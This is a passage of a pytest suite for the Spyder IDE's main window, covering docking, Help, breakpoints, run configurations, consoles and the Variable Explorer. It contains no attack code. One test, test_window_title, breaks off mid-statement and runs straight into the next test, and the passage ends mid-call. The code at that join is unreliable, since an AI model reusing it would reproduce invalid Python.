    window.completions.providers.pop('kite', None)

    yield window

    # Print shell content if failed
    if request.node.rep_setup.passed:
        if request.node.rep_call.failed:
            # Print content of shellwidget and close window
            print(window.ipyconsole.get_current_shellwidget(
                )._control.toPlainText())

            # Print info page content is not blank
            console = window.ipyconsole
            client = console.get_current_client()
            if client.info_page != client.blank_page:
                print('info_page')
                print(client.info_page)

            window.close()
            del main_window.window


@pytest.fixture(scope="session", autouse=True)
def cleanup(request):
    """Cleanup a testing directory once we are finished."""
    def close_window():
        if hasattr(main_window, 'window'):
            try:
                main_window.window.close()
            except AttributeError:
                pass

        # Also clean entry points if running locally.
        if not running_in_ci():
            remove_fake_entrypoints()

    request.addfinalizer(close_window)


# =============================================================================
# ---- Tests
# =============================================================================
@pytest.mark.slow
@pytest.mark.order(1)
@pytest.mark.single_instance
@pytest.mark.skipif(
    not running_in_ci(), reason="It's not meant to be run outside of CIs")
def test_single_instance_and_edit_magic(main_window, qtbot, tmpdir):
    """Test single instance mode and %edit magic."""
    editorstack = main_window.editor.get_current_editorstack()
    shell = main_window.ipyconsole.get_current_shellwidget()
    qtbot.waitUntil(lambda: shell._prompt_html is not None,
                    timeout=SHELL_TIMEOUT)

    spy_dir = osp.dirname(get_module_path('spyder'))
    lock_code = (
        "import sys\n"
        "sys.path.append(r'{spy_dir_str}')\n"
        "from spyder.utils.external import lockfile\n"
        "lock_file = r'{lock_file}'\n"
        "lock = lockfile.FilesystemLock(lock_file)\n"
        "lock_created = lock.lock()\n"
        "print(lock_created)".format(
            spy_dir_str=spy_dir,
            lock_file=get_conf_path('spyder.lock'))
    )

    with qtbot.waitSignal(shell.executed, timeout=2000):
        shell.execute(lock_code)
    qtbot.wait(1000)
    # The single-instance lock is already held by the running Spyder.
    assert not shell.get_value('lock_created')

    # Test %edit magic
    n_editors = editorstack.get_stack_count()
    p = tmpdir.mkdir("foo").join("bar.py")
    p.write(lock_code)

    with qtbot.waitSignal(shell.executed):
        shell.execute('%edit {}'.format(to_text_string(p)))

    qtbot.wait(3000)
    assert editorstack.get_stack_count() == n_editors + 1
    assert editorstack.get_current_editor().toPlainText() == lock_code

    main_window.editor.close_file()


@pytest.mark.slow
def test_lock_action(main_window):
    """Test the lock interface action."""
    action = main_window.layouts.lock_interface_action
    plugins = main_window.widgetlist

    # By default the interface is locked.
    assert main_window.layouts._interface_locked

    # In this state the title bar is an empty QWidget
    for plugin in plugins:
        title_bar = plugin.dockwidget.titleBarWidget()
        assert not isinstance(title_bar, DockTitleBar)
        assert isinstance(title_bar, QWidget)

    # Test that our custom title bar is shown when the action
    # is triggered.
    action.trigger()
    for plugin in plugins:
        title_bar = plugin.dockwidget.titleBarWidget()
        assert isinstance(title_bar, DockTitleBar)
    assert not main_window.layouts._interface_locked

    # Restore default state
    action.trigger()
    assert main_window.layouts._interface_locked


@pytest.mark.slow
@pytest.mark.order(1)
@pytest.mark.skipif(sys.platform.startswith('linux') and not running_in_ci(),
                    reason='Fails on Linux when run locally')
def test_default_plugin_actions(main_window, qtbot):
    """Test the effect of dock, undock, close and toggle view actions."""
    # Use a particular plugin
    file_explorer = main_window.explorer
    main_widget = file_explorer.get_widget()

    # Undock action
    main_widget.undock_action.triggered.emit(True)
    qtbot.wait(500)
    main_widget.windowwidget.move(200, 200)
    assert not file_explorer.dockwidget.isVisible()
    assert main_widget.undock_action is not None
    assert isinstance(main_widget.windowwidget, SpyderWindowWidget)
    assert main_widget.windowwidget.centralWidget() == main_widget

    # Dock action
    main_widget.dock_action.triggered.emit(True)
    qtbot.wait(500)
    assert file_explorer.dockwidget.isVisible()
    assert main_widget.windowwidget is None

    # Test geometry was saved on close
    geometry = file_explorer.get_conf('window_geometry')
    assert geometry != ''

    # Test restoring undocked plugin with the right geometry
    file_explorer.set_conf('undocked_on_window_close', True)
    main_window.restore_undocked_plugins()
    assert main_widget.windowwidget is not None
    assert (
        geometry ==
        qbytearray_to_str(main_widget.windowwidget.saveGeometry())
    )
    main_widget.windowwidget.close()

    # Close action
    main_widget.close_action.triggered.emit(True)
    qtbot.wait(500)
    assert not file_explorer.dockwidget.isVisible()
    assert not file_explorer.toggle_view_action.isChecked()

    # Toggle view action
    file_explorer.toggle_view_action.setChecked(True)
    assert file_explorer.dockwidget.isVisible()


@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.parametrize('main_window',
                         [{'spy_config': ('main', 'opengl', 'software')}],
                         indirect=True)
def test_opengl_implementation(main_window, qtbot):
    """
    Test that we are setting the selected OpenGL implementation
    """
    assert main_window._test_setting_opengl('software')

    # Restore default config value
    CONF.set('main', 'opengl', 'automatic')


@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(
    np.__version__ < '1.14.0' or (os.name == 'nt' and PY2),
    reason="This only happens in Numpy 1.14+"
)
@pytest.mark.parametrize('main_window',
                         [{'spy_config': ('variable_explorer', 'minmax', True)}],
                         indirect=True)
def test_filter_numpy_warning(main_window, qtbot):
    """
    Test that we filter a warning shown when an array contains nan
    values and the Variable Explorer option 'Show arrays min/man'
    is on.

    For spyder-ide/spyder#7063.
    """
    shell = main_window.ipyconsole.get_current_shellwidget()
    control = shell._control
    qtbot.waitUntil(lambda: shell._prompt_html is not None,
                    timeout=SHELL_TIMEOUT)

    # Create an array with a nan value
    with qtbot.waitSignal(shell.executed):
        shell.execute('import numpy as np; A=np.full(16, np.nan)')

    qtbot.wait(1000)

    # Assert that no warnings are shown in the console
    assert "warning" not in control.toPlainText()
    assert "Warning" not in control.toPlainText()

    # Restore default config value
    CONF.set('variable_explorer', 'minmax', False)


@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(PY2 or not sys.platform == 'darwin',
                    reason="Times out in PY2 and fails on other than macOS")
def test_get_help_combo(main_window, qtbot):
    """
    Test that Help can display docstrings for names typed in its combobox.
    """
    shell = main_window.ipyconsole.get_current_shellwidget()
    qtbot.waitUntil(lambda: shell._prompt_html is not None,
                    timeout=SHELL_TIMEOUT)
    help_plugin = main_window.help
    webview = help_plugin.get_widget().rich_text.webview._webview
    if WEBENGINE:
        webpage = webview.page()
    else:
        webpage = webview.page().mainFrame()

    # --- From the console ---
    # Write some object in the console
    with qtbot.waitSignal(shell.executed):
        shell.execute('import numpy as np')

    # Get help - numpy
    object_combo = help_plugin.get_widget().object_combo
    object_combo.setFocus()

    qtbot.keyClicks(object_combo, 'numpy', delay=100)

    # Check that a expected text is part of the page
    qtbot.waitUntil(lambda: check_text(webpage, "NumPy"), timeout=6000)

    # Get help - numpy.arange
    qtbot.keyClicks(object_combo, '.arange', delay=100)

    # Check that a expected text is part of the page
    qtbot.waitUntil(lambda: check_text(webpage, "arange"), timeout=6000)

    # Get help - np
    # Clear combo
    object_combo.set_current_text('')

    qtbot.keyClicks(object_combo, 'np', delay=100)

    # Check that a expected text is part of the page
    qtbot.waitUntil(lambda: check_text(webpage, "NumPy"), timeout=6000)

    # Get help - np.arange
    qtbot.keyClicks(object_combo, '.arange', delay=100)

    # Check that a expected text is part of the page
    qtbot.waitUntil(lambda: check_text(webpage, "arange"), timeout=6000)


@pytest.mark.slow
@pytest.mark.skipif(PY2, reason="Invalid definition of function in Python 2.")
def test_get_help_ipython_console_dot_notation(main_window, qtbot, tmpdir):
    """
    Test that Help works when called from the IPython console
    with dot calls i.e np.sin

    See spyder-ide/spyder#11821
    """
    shell = main_window.ipyconsole.get_current_shellwidget()
    control = shell._control
    qtbot.waitUntil(lambda: shell._prompt_html is not None,
                    timeout=SHELL_TIMEOUT)

    # Open test file
    test_file = osp.join(LOCATION, 'script_unicode.py')
    main_window.editor.load(test_file)
    code_editor = main_window.editor.get_focus_widget()

    # Run test file
    qtbot.keyClick(code_editor, Qt.Key_F5)
qtbot.wait(500) help_plugin = main_window.help webview = help_plugin.get_widget().rich_text.webview._webview webpage = webview.page() if WEBENGINE else webview.page().mainFrame() # Write function name qtbot.keyClicks(control, u'np.linalg.norm') # Get help control.inspect_current_object() # Check that a expected text is part of the page qtbot.waitUntil( lambda: check_text(webpage, "Matrix or vector norm."), timeout=6000) @pytest.mark.slow @flaky(max_runs=3) @pytest.mark.skipif(sys.platform == 'darwin', reason="Too flaky on Mac") def test_get_help_ipython_console_special_characters( main_window, qtbot, tmpdir): """ Test that Help works when called from the IPython console for unusual characters. See spyder-ide/spyder#7699 """ shell = main_window.ipyconsole.get_current_shellwidget() control = shell._control qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT) # Open test file test_file = osp.join(LOCATION, 'script_unicode.py') main_window.editor.load(test_file) code_editor = main_window.editor.get_focus_widget() # Run test file qtbot.keyClick(code_editor, Qt.Key_F5) qtbot.wait(500) help_plugin = main_window.help webview = help_plugin.get_widget().rich_text.webview._webview webpage = webview.page() if WEBENGINE else webview.page().mainFrame() # Write function name and assert in Console def check_control(control, value): return value in control.toPlainText() qtbot.keyClicks(control, u'aa\t') qtbot.waitUntil(lambda: check_control(control, u'aaʹbb'), timeout=2000) # Get help control.inspect_current_object() # Check that a expected text is part of the page qtbot.waitUntil(lambda: check_text(webpage, "This function docstring."), timeout=6000) @pytest.mark.slow @flaky(max_runs=3) @pytest.mark.skipif(os.name == 'nt' and running_in_ci(), reason="Times out on Windows") def test_get_help_ipython_console(main_window, qtbot): """Test that Help works when called from the IPython console.""" shell = main_window.ipyconsole.get_current_shellwidget() control = 
shell._control qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT) help_plugin = main_window.help webview = help_plugin.get_widget().rich_text.webview._webview webpage = webview.page() if WEBENGINE else webview.page().mainFrame() # Write some object in the console qtbot.keyClicks(control, 'runfile') # Get help control.inspect_current_object() # Check that a expected text is part of the page qtbot.waitUntil(lambda: check_text(webpage, "namespace"), timeout=6000) @pytest.mark.slow @flaky(max_runs=3) @pytest.mark.skipif(not sys.platform.startswith('linux'), reason="Does not work on Mac and Windows!") @pytest.mark.use_introspection @pytest.mark.parametrize( "object_info", [("range", "range"), ("import numpy as np", "An array object of arbitrary homogeneous items")]) def test_get_help_editor(main_window, qtbot, object_info): """Test that Help works when called from the Editor.""" help_plugin = main_window.help webview = help_plugin.get_widget().rich_text.webview._webview webpage = webview.page() if WEBENGINE else webview.page().mainFrame() main_window.editor.new(fname="test.py", text="") code_editor = main_window.editor.get_focus_widget() editorstack = main_window.editor.get_current_editorstack() with qtbot.waitSignal(code_editor.completions_response_signal, timeout=30000): code_editor.document_did_open() # Write some object in the editor object_name, expected_text = object_info code_editor.set_text(object_name) code_editor.move_cursor(len(object_name)) with qtbot.waitSignal(code_editor.completions_response_signal, timeout=30000): code_editor.document_did_change() # Get help with qtbot.waitSignal(code_editor.sig_display_object_info, timeout=30000): editorstack.inspect_current_object() # Check that a expected text is part of the page qtbot.waitUntil(lambda: check_text(webpage, expected_text), timeout=30000) @pytest.mark.slow def test_window_title(main_window, tmpdir): """Test window title with non-ascii characters.""" projects = 
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(not sys.platform.startswith('linux'),
                    reason="Fails sometimes on Windows and Mac")
@pytest.mark.parametrize("debugcell", [True, False])
def test_move_to_first_breakpoint(main_window, qtbot, debugcell):
    """Test that we move to the first breakpoint if there's one present."""
    # Wait until the window is fully up
    shell = main_window.ipyconsole.get_current_shellwidget()
    qtbot.waitUntil(lambda: shell._prompt_html is not None,
                    timeout=SHELL_TIMEOUT)

    # Main variables
    control = shell._control
    debug_action = main_window.debug_toolbar_actions[0]
    debug_button = main_window.debug_toolbar.widgetForAction(debug_action)

    # Clear all breakpoints
    main_window.editor.clear_all_breakpoints()

    # Load test file
    test_file = osp.join(LOCATION, 'script.py')
    main_window.editor.load(test_file)
    code_editor = main_window.editor.get_focus_widget()

    # Set breakpoint (sic: the debugger API method is named
    # "toogle_breakpoint")
    code_editor.debugger.toogle_breakpoint(line_number=10)
    qtbot.wait(500)
    cursor = code_editor.textCursor()
    cursor.setPosition(0)
    code_editor.setTextCursor(cursor)

    if debugcell:
        # Advance 2 cells
        for i in range(2):
            qtbot.keyClick(code_editor, Qt.Key_Return,
                           modifier=Qt.ShiftModifier)
            qtbot.wait(500)

        # Debug the cell
        with qtbot.waitSignal(shell.executed):
            qtbot.keyClick(code_editor, Qt.Key_Return,
                           modifier=Qt.AltModifier | Qt.ShiftModifier)

        # Make sure everything is ready
        assert shell.spyder_kernel_comm.is_open()
        assert shell.is_waiting_pdb_input()

        with qtbot.waitSignal(shell.executed):
            shell.pdb_execute('!b')
        assert 'script.py:10' in shell._control.toPlainText()

        # We need to press continue as we don't test yet if a breakpoint
        # is in the cell
        with qtbot.waitSignal(shell.executed):
            shell.pdb_execute('!c')
    else:
        # Click the debug button
        with qtbot.waitSignal(shell.executed):
            qtbot.mouseClick(debug_button, Qt.LeftButton)

    # Verify that we are at first breakpoint
    shell.clear_console()
    qtbot.wait(500)
    with qtbot.waitSignal(shell.executed):
        shell.pdb_execute("!list")
    assert "1--> 10 arr = np.array(li)" in control.toPlainText()

    # Exit debugging
    with qtbot.waitSignal(shell.executed):
        shell.pdb_execute("!exit")

    # Set breakpoint on first line with code
    code_editor.debugger.toogle_breakpoint(line_number=2)

    # Click the debug button
    with qtbot.waitSignal(shell.executed):
        qtbot.mouseClick(debug_button, Qt.LeftButton)

    # Wait until continue and stop on the breakpoint
    qtbot.waitUntil(lambda: "IPdb [2]:" in control.toPlainText())

    # Verify that we are still on debugging
    assert shell.is_waiting_pdb_input()

    # Remove breakpoint and close test file
    main_window.editor.clear_all_breakpoints()
    main_window.editor.close_file()


@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt', reason='Fails on windows!')
def test_runconfig_workdir(main_window, qtbot, tmpdir):
    """Test runconfig workdir options."""
    from spyder.plugins.run.widgets import RunConfiguration
    CONF.set('run', 'configurations', [])

    # ---- Load test file ----
    test_file = osp.join(LOCATION, 'script.py')
    main_window.editor.load(test_file)
    code_editor = main_window.editor.get_focus_widget()

    # --- Use cwd for this file ---
    rc = RunConfiguration().get()
    rc['file_dir'] = False
    rc['cw_dir'] = True
    config_entry = (test_file, rc)
    CONF.set('run', 'configurations', [config_entry])

    # --- Run test file ---
    shell = main_window.ipyconsole.get_current_shellwidget()
    qtbot.waitUntil(lambda: shell._prompt_html is not None,
                    timeout=SHELL_TIMEOUT)
    qtbot.keyClick(code_editor, Qt.Key_F5)
    qtbot.wait(500)

    # --- Assert we're in cwd after execution ---
    with qtbot.waitSignal(shell.executed):
        shell.execute('import os; current_dir = os.getcwd()')
    assert shell.get_value('current_dir') == get_home_dir()

    # --- Use fixed execution dir for test file ---
    temp_dir = str(tmpdir.mkdir("test_dir"))
    rc['file_dir'] = False
    rc['cw_dir'] = False
    rc['fixed_dir'] = True
    rc['dir'] = temp_dir
    config_entry = (test_file, rc)
    CONF.set('run', 'configurations', [config_entry])

    # --- Run test file ---
    shell = main_window.ipyconsole.get_current_shellwidget()
    qtbot.waitUntil(lambda: shell._prompt_html is not None,
                    timeout=SHELL_TIMEOUT)
    qtbot.keyClick(code_editor, Qt.Key_F5)
    qtbot.wait(500)

    # --- Assert we're in fixed dir after execution ---
    with qtbot.waitSignal(shell.executed):
        shell.execute('import os; current_dir = os.getcwd()')
    assert shell.get_value('current_dir') == temp_dir

    # ---- Closing test file and resetting config ----
    main_window.editor.close_file()
    CONF.set('run', 'configurations', [])


@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt' or sys.platform == 'darwin',
                    reason="It's failing there")
def test_dedicated_consoles(main_window, qtbot):
    """Test running code in dedicated consoles."""
    from spyder.plugins.run.widgets import RunConfiguration

    # ---- Load test file ----
    test_file = osp.join(LOCATION, 'script.py')
    main_window.editor.load(test_file)
    code_editor = main_window.editor.get_focus_widget()

    # --- Set run options for this file ---
    rc = RunConfiguration().get()
    # A dedicated console is used when these two options are False
    # (sic: the config key really is spelled 'systerm')
    rc['current'] = rc['systerm'] = False
    config_entry = (test_file, rc)
    CONF.set('run', 'configurations', [config_entry])

    # --- Run test file and assert that we get a dedicated console ---
    qtbot.keyClick(code_editor, Qt.Key_F5)
    qtbot.wait(500)
    shell = main_window.ipyconsole.get_current_shellwidget()
    control = shell._control
    qtbot.waitUntil(lambda: shell._prompt_html is not None,
                    timeout=SHELL_TIMEOUT)
    nsb = main_window.variableexplorer.current_widget()

    assert len(main_window.ipyconsole.get_clients()) == 2
    assert main_window.ipyconsole.get_widget().filenames == ['', test_file]
    assert main_window.ipyconsole.get_widget().tabwidget.tabText(1) == 'script.py/A'
    qtbot.wait(500)
    assert nsb.editor.source_model.rowCount() == 4

    # --- Assert only runfile text is present and there's no banner text ---
    # See spyder-ide/spyder#5301.
    text = control.toPlainText()
    assert ('runfile' in text) and not ('Python' in text or 'IPython' in text)

    # --- Clean namespace after re-execution ---
    with qtbot.waitSignal(shell.executed):
        shell.execute('zz = -1')
    qtbot.keyClick(code_editor, Qt.Key_F5)
    qtbot.wait(500)
    assert not shell.is_defined('zz')

    # --- Assert runfile text is present after reruns ---
    assert 'runfile' in control.toPlainText()

    # ---- Closing test file and resetting config ----
    main_window.editor.close_file()
    CONF.set('run', 'configurations', [])


@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(sys.platform.startswith('linux'),
                    reason="Fails frequently on Linux")
def test_connection_to_external_kernel(main_window, qtbot):
    """Test that only Spyder kernels are connected to the Variable Explorer."""
    # Test with a generic kernel
    km, kc = start_new_kernel()

    main_window.ipyconsole.get_widget()._create_client_for_kernel(
        kc.connection_file, None, None, None)
    shell = main_window.ipyconsole.get_current_shellwidget()
    qtbot.waitUntil(lambda: shell._prompt_html is not None,
                    timeout=SHELL_TIMEOUT)
    with qtbot.waitSignal(shell.executed):
        shell.execute('a = 10')

    # Assert that there are no variables in the variable explorer
    main_window.variableexplorer.change_visibility(True)
    nsb = main_window.variableexplorer.current_widget()
    qtbot.wait(500)
    assert nsb.editor.source_model.rowCount() == 0

    python_shell = shell

    # Test with a kernel from Spyder
    spykm, spykc = start_new_kernel(spykernel=True)
    main_window.ipyconsole.get_widget()._create_client_for_kernel(
        spykc.connection_file, None, None, None)
    shell = main_window.ipyconsole.get_current_shellwidget()
    qtbot.waitUntil(lambda: shell._prompt_html is not None,
                    timeout=SHELL_TIMEOUT)
    with qtbot.waitSignal(shell.executed):
        shell.execute('a = 10')

    # Assert that a variable is visible in the variable explorer
    main_window.variableexplorer.change_visibility(True)
    nsb = main_window.variableexplorer.current_widget()
    qtbot.wait(500)
    assert nsb.editor.source_model.rowCount() == 1

    # Test runfile in external_kernel
    run_action = main_window.run_toolbar_actions[0]
    run_button = main_window.run_toolbar.widgetForAction(run_action)

    # create new file
    main_window.editor.new()
    code_editor = main_window.editor.get_focus_widget()
    code_editor.set_text(
        "print(2 + 1)"
    )

    # Start running
    with qtbot.waitSignal(shell.executed):
        qtbot.mouseClick(run_button, Qt.LeftButton)

    assert "runfile" in shell._control.toPlainText()
    assert "3" in shell._control.toPlainText()

    # Try quitting the kernels
    shell.execute('quit()')
    python_shell.execute('quit()')
    qtbot.wait(1000)

    # Make sure everything quit properly
    assert not km.is_alive()
    assert not spykm.is_alive()

    # Close the channels
    spykc.stop_channels()
    kc.stop_channels()


@pytest.mark.order(1)
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt',
                    reason="It times out sometimes on Windows")
def test_change_types_in_varexp(main_window, qtbot):
    """Test that variable types can't be changed in the Variable Explorer."""
    # Create object
    shell = main_window.ipyconsole.get_current_shellwidget()
    qtbot.waitUntil(lambda: shell._prompt_html is not None,
                    timeout=SHELL_TIMEOUT)
    with qtbot.waitSignal(shell.executed):
        shell.execute('a = 10')

    # Edit object
    main_window.variableexplorer.change_visibility(True)
    nsb = main_window.variableexplorer.current_widget()
    qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() > 0,
                    timeout=EVAL_TIMEOUT)
    nsb.editor.setFocus()
    nsb.editor.edit_item()

    # Try to change types
    qtbot.keyClicks(QApplication.focusWidget(), "'s'")
    qtbot.keyClick(QApplication.focusWidget(), Qt.Key_Enter)
    qtbot.wait(1000)

    # Assert object remains the same
    assert shell.get_value('a') == 10
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.parametrize("test_directory", [u"non_ascii_ñ_í_ç", u"test_dir"])
@pytest.mark.skipif(sys.platform == 'darwin', reason="It fails on macOS")
def test_change_cwd_ipython_console(
        main_window, qtbot, tmpdir, test_directory):
    """
    Test synchronization with working directory and File Explorer when
    changing cwd in the IPython console.
    """
    wdir = main_window.workingdirectory
    treewidget = main_window.explorer.get_widget().treewidget
    shell = main_window.ipyconsole.get_current_shellwidget()

    # Wait until the window is fully up
    qtbot.waitUntil(
        lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)

    # Create temp dir
    temp_dir = str(tmpdir.mkdir(test_directory))

    # Change directory in IPython console using %cd
    with qtbot.waitSignal(shell.executed):
        shell.execute(u"%cd {}".format(temp_dir))

    qtbot.wait(1000)

    # Assert that cwd changed in workingdirectory
    assert osp.normpath(wdir.get_container().history[-1]) == osp.normpath(
        temp_dir)

    # Assert that cwd changed in explorer
    assert osp.normpath(treewidget.get_current_folder()) == osp.normpath(
        temp_dir)


@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.parametrize("test_directory", [u"non_ascii_ñ_í_ç", u"test_dir"])
@pytest.mark.skipif(sys.platform == 'darwin', reason="It fails on macOS")
def test_change_cwd_explorer(main_window, qtbot, tmpdir, test_directory):
    """
    Test synchronization with working directory and IPython console when
    changing directories in the File Explorer.
    """
    wdir = main_window.workingdirectory
    explorer = main_window.explorer
    shell = main_window.ipyconsole.get_current_shellwidget()

    # Wait until the window is fully up
    qtbot.waitUntil(
        lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)

    # Create temp directory
    temp_dir = to_text_string(tmpdir.mkdir(test_directory))

    # Change directory in the explorer widget
    explorer.chdir(temp_dir)
    qtbot.wait(1000)

    # Assert that cwd changed in workingdirectory
    assert osp.normpath(wdir.get_container().history[-1]) == osp.normpath(
        temp_dir)

    # Assert that cwd changed in IPython console
    assert osp.normpath(temp_dir) == osp.normpath(shell._cwd)


@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(
    (os.name == 'nt' or sys.platform == 'darwin' or
     parse_version(ipy_release.version) == parse_version('7.11.0')),
    reason="Hard to test on Windows and macOS and fails for IPython 7.11.0")
def test_run_cython_code(main_window, qtbot):
    """Test all the different ways we have to run Cython code."""
    # ---- Setup ----
    # Get a reference to the code editor widget
    code_editor = main_window.editor.get_focus_widget()

    # ---- Run pyx file ----
    # Load test file
    main_window.editor.load(osp.join(LOCATION, 'pyx_script.pyx'))

    # Run file
    qtbot.keyClick(code_editor, Qt.Key_F5)

    # Get a reference to the namespace browser widget
    nsb = main_window.variableexplorer.current_widget()

    # Wait until an object appears
    qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 1,
                    timeout=COMPILE_AND_EVAL_TIMEOUT)

    # Verify result
    shell = main_window.ipyconsole.get_current_shellwidget()
    assert shell.get_value('a') == 3628800

    # Reset and close file
    reset_run_code(qtbot, shell, code_editor, nsb)
    main_window.editor.close_file()

    # ---- Import pyx file ----
    # Load test file
    main_window.editor.load(osp.join(LOCATION, 'pyx_lib_import.py'))

    # Run file
    qtbot.keyClick(code_editor, Qt.Key_F5)

    # Wait until all objects have appeared in the variable explorer
    qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 1,
                    timeout=COMPILE_AND_EVAL_TIMEOUT)

    # Verify result
    assert shell.get_value('b') == 3628800

    # Close file
    main_window.editor.close_file()


@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt', reason="It fails on Windows.")
def test_open_notebooks_from_project_explorer(main_window, qtbot, tmpdir):
    """Test that notebooks are open from the Project explorer."""
    projects = main_window.projects
    projects.toggle_view_action.setChecked(True)
    editorstack = main_window.editor.get_current_editorstack()

    # Create a temp project directory
    project_dir = to_text_string(tmpdir.mkdir('test'))

    # Create an empty notebook in the project dir
    nb = osp.join(LOCATION, 'notebook.ipynb')
    shutil.copy(nb, osp.join(project_dir, 'notebook.ipynb'))

    # Create project
    with qtbot.waitSignal(projects.sig_project_loaded):
        projects._create_project(project_dir)

    # Select notebook in the project explorer
    idx = projects.get_widget().treewidget.get_index(
        osp.join(project_dir, 'notebook.ipynb'))
    projects.get_widget().treewidget.setCurrentIndex(idx)

    # Press Enter there
    qtbot.keyClick(projects.get_widget().treewidget, Qt.Key_Enter)

    # Assert that notebook was open
    assert 'notebook.ipynb' in editorstack.get_current_filename()

    # Convert notebook to a Python file
    projects.get_widget().treewidget.convert_notebook(
        osp.join(project_dir, 'notebook.ipynb'))

    # Assert notebook was open
    assert 'untitled' in editorstack.get_current_filename()

    # Assert its contents are the expected ones
    file_text = editorstack.get_current_editor().toPlainText()
    if nbconvert.__version__ >= '5.4.0':
        expected_text = ('#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:'
                         '\n\n\n1 + 1\n\n\n# In[ ]:\n\n\n\n\n')
    else:
        expected_text = '\n# coding: utf-8\n\n# In[1]:\n\n\n1 + 1\n\n\n'
    assert file_text == expected_text

    # Close project
    projects.close_project()


@pytest.mark.slow
@flaky(max_runs=3)
def test_runfile_from_project_explorer(main_window, qtbot, tmpdir):
    """Test that files are run from the Project explorer."""
    projects = main_window.projects
    projects.toggle_view_action.setChecked(True)
    editorstack = main_window.editor.get_current_editorstack()

    # Create a temp project directory
    project_dir = to_text_string(tmpdir.mkdir('test'))

    # Create an empty file in the project dir
    test_file = osp.join(LOCATION, 'script.py')
    shutil.copy(test_file, osp.join(project_dir, 'script.py'))

    # Create project
    with qtbot.waitSignal(projects.sig_project_loaded):
        projects._create_project(project_dir)

    # Select file in the project explorer
    idx = projects.get_widget().treewidget.get_index(
        osp.join(project_dir, 'script.py'))
    projects.get_widget().treewidget.setCurrentIndex(idx)

    # Press Enter there
    qtbot.keyClick(projects.get_widget().treewidget, Qt.Key_Enter)

    # Assert that the file was open
    assert 'script.py' in editorstack.get_current_filename()

    # Run Python file
    projects.get_widget().treewidget.run([osp.join(project_dir, 'script.py')])

    # Wait until the new console is fully up
    shell = main_window.ipyconsole.get_current_shellwidget()
    qtbot.waitUntil(lambda: shell._prompt_html is not None,
                    timeout=SHELL_TIMEOUT)

    # Wait until all objects have appeared in the variable explorer
    nsb = main_window.variableexplorer.current_widget()
    qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 4,
                    timeout=EVAL_TIMEOUT)

    # Check variables value
    assert shell.get_value('a') == 10
    assert shell.get_value('s') == "Z:\\escape\\test\\string\n"
    assert shell.get_value('li') == [1, 2, 3]
    assert_array_equal(shell.get_value('arr'), np.array([1, 2, 3]))

    # Close project
    projects.close_project()


@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt',
                    reason="It times out sometimes on Windows")
def test_set_new_breakpoints(main_window, qtbot):
    """Test that new breakpoints are set in the IPython console."""
    # Wait until the window is fully up
    shell = main_window.ipyconsole.get_current_shellwidget()
    control = shell._control
    qtbot.waitUntil(lambda: shell._prompt_html is not None,
                    timeout=SHELL_TIMEOUT)

    # Clear all breakpoints
    main_window.editor.clear_all_breakpoints()

    # Load test file
    test_file = osp.join(LOCATION, 'script.py')
    main_window.editor.load(test_file)

    # Click the debug button
    debug_action = main_window.debug_toolbar_actions[0]
    debug_button = main_window.debug_toolbar.widgetForAction(debug_action)
    with qtbot.waitSignal(shell.executed):
        qtbot.mouseClick(debug_button, Qt.LeftButton)

    # Set a breakpoint (sic: the debugger API method is named
    # "toogle_breakpoint")
    code_editor = main_window.editor.get_focus_widget()
    code_editor.debugger.toogle_breakpoint(line_number=6)

    # Verify that the breakpoint was set
    with qtbot.waitSignal(shell.executed):
        shell.pdb_execute("!b")
    assert "1 breakpoint keep yes at {}:6".format(test_file) in control.toPlainText()

    # Remove breakpoint and close test file
    main_window.editor.clear_all_breakpoints()
    main_window.editor.close_file()
@pytest.mark.slow
@flaky(max_runs=3)
def test_run_code(main_window, qtbot, tmpdir):
    """Test all the different ways we have to run code."""
    # ---- Setup ----
    p = (tmpdir.mkdir(u"runtest's folder èáïü Øαôå 字分误")
         .join(u"runtest's file èáïü Øαôå 字分误.py"))
    filepath = to_text_string(p)
    shutil.copyfile(osp.join(LOCATION, 'script.py'), filepath)

    # Wait until the window is fully up
    shell = main_window.ipyconsole.get_current_shellwidget()
    qtbot.waitUntil(lambda: shell._prompt_html is not None,
                    timeout=SHELL_TIMEOUT)

    # Load test file
    main_window.editor.load(filepath)

    # Move to the editor's first line
    code_editor = main_window.editor.get_focus_widget()
    code_editor.setFocus()
    qtbot.keyClick(code_editor, Qt.Key_Home, modifier=Qt.ControlModifier)

    # Get a reference to the namespace browser widget
    nsb = main_window.variableexplorer.current_widget()

    # ---- Run file ----
    qtbot.keyClick(code_editor, Qt.Key_F5)

    # Wait until all objects have appeared in the variable explorer
    qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 4,
                    timeout=EVAL_TIMEOUT)

    # Verify result
    assert shell.get_value('a') == 10
    assert shell.get_value('s') == "Z:\\escape\\test\\string\n"
    assert shell.get_value('li') == [1, 2, 3]
    assert_array_equal(shell.get_value('arr'), np.array([1, 2, 3]))

    reset_run_code(qtbot, shell, code_editor, nsb)

    # ---- Run lines ----
    # Run the whole file line by line
    for _ in range(code_editor.blockCount()):
        qtbot.keyClick(code_editor, Qt.Key_F9)
        qtbot.wait(200)

    # Wait until all objects have appeared in the variable explorer
    qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 4,
